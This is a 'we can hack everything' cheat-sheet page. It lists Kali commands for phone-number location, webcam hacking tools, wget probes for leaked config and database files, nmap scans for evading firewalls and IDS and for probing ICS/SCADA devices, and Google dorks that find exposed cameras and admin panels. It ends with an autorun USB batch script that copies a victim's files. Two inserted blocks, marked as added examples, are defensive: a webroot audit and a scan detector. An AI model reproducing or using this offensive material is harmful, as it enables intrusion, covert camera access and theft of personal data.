Privacy & Security: No Such Thing Exists in the Digital World, We Can Hack Everything
Locate any phone number
root@kali:~# apt-get update
root@kali:~# apt-get install git
root@kali:~# apt-get install python3-pip
root@kali:~# apt install python3
root@kali:~# git clone https://github.com/akashblackhat/Live-location.py.git
root@kali:~# ls
root@kali:~# cd Live-location.py
root@kali:~# python3 Live-location.py
Download Web Page to File with telnet
root@kali:~# telnet website 80
Trying website...
Connected to website.
Escape character is '^]'.
GET /index.html
Inspecting HTTPS (TLS, SSL) certificates from the command line.
root@kali:~# openssl s_client -showcerts -connect website:443
root@kali:~# curl -vvI https://website
root@kali:~# nmap -p 443 --script ssl-cert website
See all connections
root@kali:~# netstat -an | more
Subdomain Hack trick perl script code
root@kali:~# cpan LWP::Protocol::https
Installing this module with CPAN and with make produced some errors. A forced install was also tried, and the module now shows in the list of installed modules,
but the script still writes: 501 Protocol scheme 'https' is not supported (LWP::Protocol::https not installed)
Fix: try installing the packaged module for your distribution
Fedora 20
sudo yum install perl-LWP-Protocol-https perl-Crypt-SSLeay
RedHat
sudo yum install perl-Crypt-SSLeay
Debian, Ubuntu
sudo apt-get install libcrypt-ssleay-perl
Arch Linux, Manjaro
sudo pacman -S perl-lwp-protocol-https
Usage example
Copy the code below and save it as Subdomain.pl
root@kali:~# perl Subdomain.pl <target> | more
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
my $domain = shift or die "Usage: $0 domain.com\n";
my $ua = LWP::UserAgent->new;
my $response = $ua->get("http://api.hackertarget.com/hostsearch/?q=$domain");
if ($response->is_success) {
    my $result = $response->decoded_content;
    print "$result\n";
} else {
    die $response->status_line;
}
CAM HACK TRICKS
root@kali:~# apt install git python3
root@kali:~# git clone https://github.com/AngelSecurityTeam/Cam-Hackers
root@kali:~# cd Cam-Hackers
root@kali:~/Cam-Hackers# pip install -r requirements.txt
root@kali:~/Cam-Hackers# python3 cam-hackers.py
Zaproxy trick
root@kali:~# apt install zaproxy tor
root@kali:~# service tor start
root@kali:~# proxychains owasp-zap -addoninstallall -quickurl <target>
Phoneinfoga install
root@kali:~# curl -sSL https://raw.githubusercontent.com/sundowndev/PhoneInfoga/master/support/scripts/install | bash
root@kali:~# sudo mv ./phoneinfoga /usr/bin/phoneinfoga
root@kali:~# phoneinfoga serve
Open http://127.0.0.1:5000/
Install Spiderfoot
root@kali:~# apt install spiderfoot
This package contains an open source intelligence (OSINT) automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname, network subnet, ASN, e-mail address or person’s name.
SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target, or defensively to identify what information you or your organisation are freely providing for attackers to use against you.
Spiderfoot Example
root@kali:~# spiderfoot -l 127.0.0.1:5001
Spiderfoot Example TOR
root@kali:~# tor --SocksPort 9050 --ControlPort 9051
Hacking with wget Use usb key
root@kali:~# wget http://website/server-status
root@kali:~# wget http://website/sftp-config.json
root@kali:~# wget http://website/app/etc/local.xml
root@kali:~# wget http://website/.git/config
root@kali:~# wget http://website/.wp-config.php.swp
root@kali:~# wget http://website/%23wp-config.php%23
root@kali:~# wget http://website/wp-config.php~
root@kali:~# wget http://website/dump.sql
root@kali:~# wget -dnv http://website/sitemap.xml
root@kali:~# wget --random-wait -r -p -e robots=off -U mozilla http://website/
root@kali:~# wget --spider -o wget.log -e robots=off --wait 1 -r -p http://website
root@kali:~# wget -b -c --tries=NUMBER http://website
root@kali:~# wget -b --limit-rate=30 -np -N -m -nd --accept=LIST --wait=5 http://website/
root@kali:~# wget -r -H --convert-links --level=NUMBER --user-agent=AGENT http://website/
root@kali:~# wget --http-user=USER --http-password=PASS http://website/
First, create a text file of all the URLs you want to download using wget and call it wget_downloads.txt. Then, to download the URLs in bulk, type in this command:
root@kali:~# wget -rH -p -dnv -i wget_downloads.txt
root@kali:~# wget -E -rH -p --no-check-certificate -dnv http://website/
root@kali:~# wget http://192.168.1.99//proc/kcore | struny | nano
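Added example (not part of the original page): a local audit that a site owner can run over their own document root to find the leak-prone files named in the wget list above (.git/config, editor backups and swap files of wp-config.php, SQL dumps, sftp-config.json, app/etc/local.xml) before they are served. The function names and the sample tree are assumptions made for this illustration.

```sh
#!/bin/sh
# Build a constructed sample document root (not from the page) for a dry run.
make_sample_root() {
  d=$(mktemp -d) || return 1
  mkdir -p "$d/.git" "$d/app/etc" "$d/blog"
  : > "$d/index.html"
  : > "$d/.git/config"               # repository metadata
  : > "$d/app/etc/local.xml"         # application config with credentials
  : > "$d/blog/wp-config.php"        # live config: expected, not reported
  : > "$d/blog/wp-config.php~"       # editor backup copy
  : > "$d/blog/.wp-config.php.swp"   # vim swap file
  : > "$d/blog/#wp-config.php#"      # emacs autosave file
  : > "$d/dump.sql"                  # database dump
  echo "$d"
}

# audit_webroot DIR: print, relative to DIR, every file whose name matches
# one of the leak-prone patterns. Returns 2 if DIR is not a directory.
audit_webroot() {
  root=$1
  [ -d "$root" ] || { echo "not a directory: $root" >&2; return 2; }
  ( cd "$root" && find . -type f \( \
        -path '*/.git/config' -o -path '*/app/etc/local.xml' \
        -o -name 'sftp-config.json' -o -name '*.sql' \
        -o -name '.*.swp' -o -name '*~' -o -name '#*#' \
      \) -print ) | sed 's|^\./||' | LC_ALL=C sort
}

# Dry run against the constructed tree; point audit_webroot at a real
# document root (for example /var/www/html) to audit a server you manage.
sample=$(make_sample_root) && audit_webroot "$sample"; rm -rf "$sample"
```

Anything the audit reports should be deleted from the document root or denied in the web server configuration.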
Nmap Tricks
ARP ping scan
nmap -sn -PR [Target IP Address/Range of IP addresses]
UDP ping scan
A UDP response means that the host is active. If the target host is offline or unreachable, various error messages such as “host/network unreachable” or “TTL exceeded” could be returned.
nmap -sn -PU [Target IP Address/Range of IP addresses]
ICMP ECHO ping scan
The ICMP ECHO ping scan involves sending ICMP ECHO requests to a host. If the target host is alive, it will return an ICMP ECHO reply. This scan is useful for locating active devices or determining whether ICMP passes through a firewall.
nmap -sn -PE [Target IP Address/Range of IP addresses]
Alternative to ICMP ECHO ping scan: ICMP Timestamp and Address Mask Ping Scan
ICMP timestamp ping scan
nmap -sn -PP [Target IP Address/Range of IP addresses]
ICMP address mask ping scan
nmap -sn -PM [Target IP Address/Range of IP addresses]
TCP ACK Ping Scan
This technique sends empty TCP ACK packets to the target host; an RST response means that the host is active.
nmap -sn -PA [Target IP Address/Range of IP addresses]
IP Protocol Ping Scan
This technique sends probe packets of different IP protocols to the target host; a response to any probe indicates that the host is active.
nmap -sn -PO [Target IP Address/Range of IP addresses]
TCP connect/full open scan
nmap -sT -v [Target IP Address/Range of IP addresses]
Stealth scan/TCP half-open scan
This scanning technique can be used to bypass firewall rules, logging mechanisms, and hide under network traffic.
nmap -sS -v [Target IP Address/Range of IP addresses]
Xmas scan
Sends a TCP frame to the target system with the FIN, URG, and PUSH flags set. If the port is open, you receive no response from the target system. If the port is closed, the target system replies with an RST.
nmap -sX -v [Target IP Address/Range of IP addresses]
TCP Maimon scan
FIN/ACK probe is sent to the target; if there is no response, then the port is Open|Filtered, but if the RST packet is sent as a response, then the port is closed.
nmap -sM -v [Target IP Address/Range of IP addresses]
ACK flag probe scan
Sends an ACK probe packet with a random sequence number; no response implies that the port is filtered (stateful firewall is present), and an RST response means that the port is not filtered.
nmap -sA -v [Target IP Address/Range of IP addresses]
UDP scan
Uses UDP protocol instead of the TCP. There is no three-way handshake for the UDP scan. It sends UDP packets to the target host; no response means that the port is open. If the port is closed, an ICMP port unreachable message is received.
nmap -sU -v [Target IP Address/Range of IP addresses]
IDLE/IPID Header Scan / Zombie Scan
A TCP port scan method that can be used to send a spoofed source address to a computer to discover what services are available.
nmap -sI [Zombie host] -v [Target IP Address/Range of IP addresses]
SCTP COOKIE ECHO Scan
A COOKIE ECHO chunk is sent to the target host; no response implies that the port is open and ABORT Chunk response means that the port is closed.
nmap -sZ -v [Target IP Address/Range of IP addresses]
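Added example (not part of the original page): a defender-side check that recognises three of the probe patterns described above (Xmas, Maimon and half-open SYN scans) in firewall logs. The log lines are constructed in netfilter LOG style; the function names and the distinct-port threshold are assumptions, and the rule is assumed to log only packets that matched no established connection.

```sh
#!/bin/sh
# Constructed sample lines in netfilter LOG style (not from the page).
# Assumption: the logging rule only sees packets that matched no
# established connection, so a lone FIN/ACK here is unsolicited.
sample_log() {
cat <<'EOF'
kernel: IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=22 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
kernel: IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=80 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
kernel: IN=eth0 SRC=198.51.100.9 DST=192.0.2.10 PROTO=TCP SPT=40002 DPT=443 WINDOW=1024 RES=0x00 ACK FIN URGP=0
kernel: IN=eth0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=21 WINDOW=1024 RES=0x00 SYN URGP=0
kernel: IN=eth0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
kernel: IN=eth0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=23 WINDOW=1024 RES=0x00 SYN URGP=0
kernel: IN=eth0 SRC=203.0.113.8 DST=192.0.2.10 PROTO=TCP SPT=52000 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0
EOF
}

# classify_scans [MIN_PORTS]: read log lines on stdin and print "SRC TYPE".
#   xmas      - exactly URG+PSH+FIN set (never valid in normal traffic)
#   maimon    - exactly ACK+FIN with no connection behind it
#   syn-sweep - bare SYNs to at least MIN_PORTS distinct ports (default 3)
classify_scans() {
  awk -v min="${1:-3}" '
    /PROTO=TCP/ {
      src = ""; dpt = ""; flags = ""; inflags = 0
      for (i = 1; i <= NF; i++) {
        if ($i ~ /^SRC=/) src = substr($i, 5)
        else if ($i ~ /^DPT=/) dpt = substr($i, 5)
        else if ($i ~ /^RES=/) inflags = 1      # flags follow RES=
        else if ($i ~ /^URGP=/) inflags = 0     # and end at URGP=
        else if (inflags) flags = flags $i " "
      }
      if (flags == "URG PSH FIN ") hit[src " xmas"] = 1
      else if (flags == "ACK FIN ") hit[src " maimon"] = 1
      else if (flags == "SYN " && !((src, dpt) in seen)) {
        seen[src, dpt] = 1; nports[src]++
      }
    }
    END {
      for (s in nports) if (nports[s] >= min) hit[s " syn-sweep"] = 1
      for (h in hit) print h
    }' | LC_ALL=C sort
}

sample_log | classify_scans 3
```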
Ping Sweep Scan
Discover the available hosts and their IP and MAC addresses, but no information about the ports.
nmap -sP [Target IP Address/Range of IP addresses]
Display the open ports and services running
nmap -T4 -A -v [Target IP Address/Range of IP addresses]
-T4: sets the timing template (0-5). -A: enables aggressive scan options (OS detection, version detection, script scanning and traceroute).
smb-os-discovery
Attempts to determine the OS, computer name, domain, workgroup, and current time over the SMB protocol
nmap --script smb-os-discovery.nse [Target IP Address/Range of IP addresses]
NetBIOS enumeration
nmap -sV -v --script nbstat.nse [Target IP Address/Range of IP addresses]
Http enum - enumerate the applications, directories, and files in a web server
nmap -sV --script http-enum [Target IP Address/Range of IP addresses]
hostmap-bfk
nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap- [Target IP Address/Range of IP addresses]
Http trace
Uses the TRACE method by sending an HTTP TRACE request that shows if the method is enabled or not
nmap --script http-trace -d [Target IP Address/Range of IP addresses]
Http frontpage login
nmap [Target IP Address/Range of IP addresses] -p 80 --script=http-frontpage-login
Http passwd
nmap --script http-passwd --script-args http-passwd.root=/ [Target IP Address/Range of IP addresses]
Check whether Web Application Firewall is configured on the target host or domain
nmap -p80 --script http-waf-detect [Target IP Address/Range of IP addresses]
Bypassing firewall/IDS
Fragment packets
Send fragmented probe packets to the intended target, which re-assembles it after receiving all the fragments.
nmap -f [Target IP Address/Range of IP addresses]
Source port manipulation
Manipulating actual port numbers with common port numbers to evade IDS/firewall (sometimes, firewall is configured to allow packets from well-known ports like HTTP, DNS, FTP, etc.).
nmap -g 80 [Target IP Address/Range of IP addresses]
Set number of Maximum Transmission Unit (MTU)
This technique evades the filtering and detection mechanism enabled in the target machine.
nmap --mtu 8 [Target IP Address/Range of IP addresses]
Decoy
Generating or manually specifying IP addresses of the decoys to evade IDS/firewall. Nmap automatically generates a random number of decoys for the scan and randomly positions the real IP address between the decoy IP addresses.
-D: performs a decoy scan. RND: generates random, non-reserved IP addresses.
nmap -D RND:10 [Target IP Address/Range of IP addresses]
Send the binary data as payload
nmap [Target IP Address/Range of IP addresses] --data 0xdeadbeef
Send string data as payload
nmap [Target IP Address/Range of IP addresses] --data-string "dummy string"
Append the number of random data bytes to most of the packets sent without any protocol-specific payloads
nmap --data-length 5 [Target IP Address/Range of IP addresses]
Scan in random order
nmap --randomize-hosts [Target IP Address/Range of IP addresses]
Send the packets with bad or bogus TCP/UDP checksums
nmap --badsum [Target IP Address/Range of IP addresses]
Scanning for vulnerabilities
Identify the IPv6 capabilities of a device
nmap -6 -n -Pn -sSU -pT:0-65535,U:0-65535 -v -A -oX [NAME] [Target IP Address/Range of IP addresses]
Check for open TCP and UDP services and ports
nmap -n -Pn -sSU -pT:0-65535,U:0-65535 -v -A -oX [NAME] [Target IP Address/Range of IP addresses]
Scan for a specific IP address
nmap -n -Pn -sS -pT:0-65535 -v -A -oX [NAME] [Target IP Address/Range of IP addresses]
Scanning ICS/SCADA systems
Identifying HMI systems
nmap -Pn -sT -p 46824 [Target IP address/Range of IP addresses]
Identifying open ports and services
nmap -Pn -sT --scan-delay 1d --max-parallelism 1 -p [port list] [Target IP address/Range of IP addresses]
Scanning Siemens SIMATIC S7 PLCs
nmap -Pn -sT -p 102 --script s7-info [Target IP address/Range of IP addresses]
Scanning ethernet/IP devices
nmap -Pn -sU -p 44818 --script enip-info [Target IP address/Range of IP addresses]
Scanning modbus devices
nmap -Pn -sT -p 502 --script modbus-discover [Target IP address/Range of IP addresses]
Scanning BACnet devices
nmap -Pn -sU -p 47808 --script bacnet-info [Target IP address/Range of IP addresses]
Scanning Niagara Fox devices
nmap -Pn -sT -p 1911,4911 --script fox-info [Target IP address/Range of IP addresses]
Scanning Omron PLC devices
nmap -Pn -sT -p 9600 --script omron-info [Target IP address/Range of IP addresses]
Scanning PCWorx devices
nmap -Pn -sT -p 1962 --script pcworx-info [Target IP address/Range of IP addresses]
Scanning ProConOS devices
nmap -Pn -sT -p 20547 --script proconos-info [Target IP address/Range of IP addresses]
Protection
Promiscuous detection
nmap --script=sniffer-detect [Target IP Address/Range of IP addresses]
🌎
inurl:login.html intitle:"GPON Home Gateway"
inurl:"portal.mwsl" "Status"
intitle:"D-LINK SYSTEMS, INC. | Web File Access : Login"
"Account" "Password" "All rights reserved" intitle:"HG8245"
intitle:"IP Webcam" inurl:"/greet.html"
inurl:login.html intitle:"Archer C7"
inurl:dtm.html intitle:1747-L551
site:*/dyn_sensors.htm "ID"
inurl:/Jview "zoom"
AXIS Camera exploit
intitle:"NetCamSC*"
"System" + "Toner" + "Input Tray" + "Output Tray" inurl:cgi
intitle:"NetCamXL*"
intitle:"Agent web client: Phone Login"
inurl:/Jview.htm + intext:"Zoom :"
intext:"Connection" AND "Network name" AND " Cisco Meraki cloud" AND "Security Appliance details"
"change the Administrator Password." intitle:"HP LaserJet" -pdf
inurl: inurl:"view.shtml" ext:shtml
inurl:"view.shtml" "camera"
inurl:"/cgi-bin/guestimage.html" "Menu"
inurl:"view.shtml" "Network"
inurl:/Jview.htm + "View Video - Java Mode"
inurl:/homej.html?
inurl: 1051/viewer/live/index.html?lang=en
inurl:/index.html?size=2&mode=4
intitle:"NetCamSC*" | intitle:"NetCamXL*" inurl:index.html
inurl:set_config_password.html
inurl:/8080 "windows" "live view"
inurl:"webArch/mainFrame.cgi" + "Web Image Monitor"
"Pop-up" + "Live Image" inurl:index.html
inurl:"live/cam.html"
inurl:"/viewer/live.html"
inurl:/CgiStart?page
inurl:"/viewer/live/index.html"
intitle:"Rockwell Automation" inurl:"index.html" "Device Name"
inurl:8080/view/viewer_index.shtml?id= -site:*.com
intitle:"Miniweb Start Page"
inurl:/presentation/html/top/index.html
allintitle:"Welcome to the Web-Based Configurator"
inurl:"view.shtml" "Network Camera"
intitle:"Tuxedo Connected Controller"
inurl:/config/cam_portal.cgi "Panasonic"
inurl:.*eservices/login
"Camera Live Image" inurl:"guestimage.html"
intitle:"UPS Status" "Status" inurl:/host
intitle:"webcam" inurl:login
"HP LaserJet" inurl:"SSI/index.htm"
inurl:8081/ "Pan, Tilt & Zoom"
inurl:axis-cgi/mjpg/video swf
inurl:/home/homej.html
intext:"Frame rate" inurl:/home/homej.html
intext:"Device Name" | intext:"Host Name" inurl:mainFrame.cgi
inurl:"/general/status.html"
inurl:axis-cgi/jpg
inurl:/ViewerFrame? intitle:"Network Camera NetworkCamera"
inurl /view.shtml intext:"Airport"
intitle:"SFXAdmin - sfx_global" intext:"Login Form"
inurl:/sws/index.html
inurl:/jobq.htm AND intext:"ApeosPort-V"
inurl:/base/main_login.html intext:"Login"
inurl:index.shtml
allinurl:top.htm?Currenttime
intitle:"HP ALM" "Application Lifecycle Management" inurl:/qcbin/ -ext:PDF
intitle:"WEBCAM 7 " -inurl:/admin.html
site:*/EWS/Exchange.asmx
inurl:/db.php?path_local=
inurl:/gmap.php?id=
intitle:"WeatherLinkIP Configuration"
intitle:"Internet Services" inurl:default.htm intext:"FUJI XEROX"
intitle:"Kyocera Command Center" inurl:index.htm
inurl:8080/dashboard.php
inurl:8080/dashboard intitle:Graphite Dashboard
inurl:/index.htm intext:"Oki Data Corporation"
inurl:mainFrame.cgi intext:"RICOH"
inurl:/?MAIN=DEVICE intitle:TopAccess intext:Device
inurl:/main.html intext:SHARP AND intext:MX-*
inurl:sws/index.html AND intext:"Model Name" AND intext:"Serial Number"
inurl:/dana/home/ filetype:cgi
inurl:/dana-cached/sc/
intitle:"index of" "cvsweb.cgi"
inurl:SSI/index.htm
inurl:./sws/index.sws
inurl:/frameprop.htm
inurl:"/English/pages_WinUS/" AND intitle:"Top page"
intitle:"Printer Status" AND inurl:"/PrinterStatus.html"
intitle:("Solr Admin") AND intext:("Dashboard" AND "Corporation")
inurl:axis-cgi/mjpg/video.cgi
inurl:8000 intext:"Copyright CANON INC. 2012"
inurl:cgistart
inurl:view.shtml
intitle:NetworkCamera intext:"Pan / Tilt" inurl:ViewerFrame
inurl:/live.htm intext:"M-JPEG"|"System Log"|"Camera-1"|"View Control"
intitle:("Solr admin page") AND intext:("Make a Query")
inurl:/HDDReplay.html
intitle:"webcamXP 5" inurl:8080 'Live'
intext:"EWS Data Collection and Use"
inurl:hp/device/deviceinformation
intitle:ThingsBoard inurl:8080/dashboard
filetype:psp intitle:"Motorola - FX9500"
inurl:"view/index.shtml"
inurl:"MultiCameraFrame?Mode=Motion"
"VB Viewer" inurl:/viewer/live/ja/live.html
intitle:"IP CAMERA Viewer" intext:"setting | Client setting"
inurl:"nobody/loginQuick.htm"
site:*/cgi-bin/webproc intext:"username"
inurl:/swagger/index.html
intext:"Security is Off" intitle:"Namenode information"
"Firmware Version" intitle:"iLO" ProLiant Login -hpe.com -update
intitle:rsview32 ext:asp
intitle:"WSO2 Management Console"
intitle:"Home - Mongo Express"
inurl:"8080/dashboard/" intitle:"Dashboard"
inurl:"/index.php?enter=guest"
inurl:CGI/Java/Serviceability?adapter=device.statistics.device
intitle:"Marshall VS Server"
intext:{{szErrorTip}} inurl:/doc/page/login.asp
intitle:"openshift web console" inurl:console inurl:/console
inurl:"/hp_login.html"
inurl:webArch/mainFrame filetype:cgi intext:"Web Image Monitor"
intitle:"VideoEdge Admin Interface"
USB HACK TRICK
Step 1: Open new Notepad File and type code given below and save as autorun.inf
[autorun]
open=new.bat
icon=new.bat,0
Step 2: Open another new Notepad File and type code given below and save as new.bot
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y /g
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
%backupcmd% "%USERPROFILE%\Download" "%drive%\all\Download"
%backupcmd% "%USERPROFILE%\Desktop" "%drive%\all\Desktop"
%backupcmd% "%USERPROFILE%\Music" "%drive%\all\Music"
%backupcmd% "%USERPROFILE%\Documents" "%drive%\all\Documents"
@echo off
Step 3: Paste both files new.bat & autorun.inf in your USB Drive
Step 4: Insert the USB drive into victims computer. Once you insert it, you will get all the data from victims computer. If it doesn’t work, simply open the Pendrive and double click on new.bat, the data will copies successfully.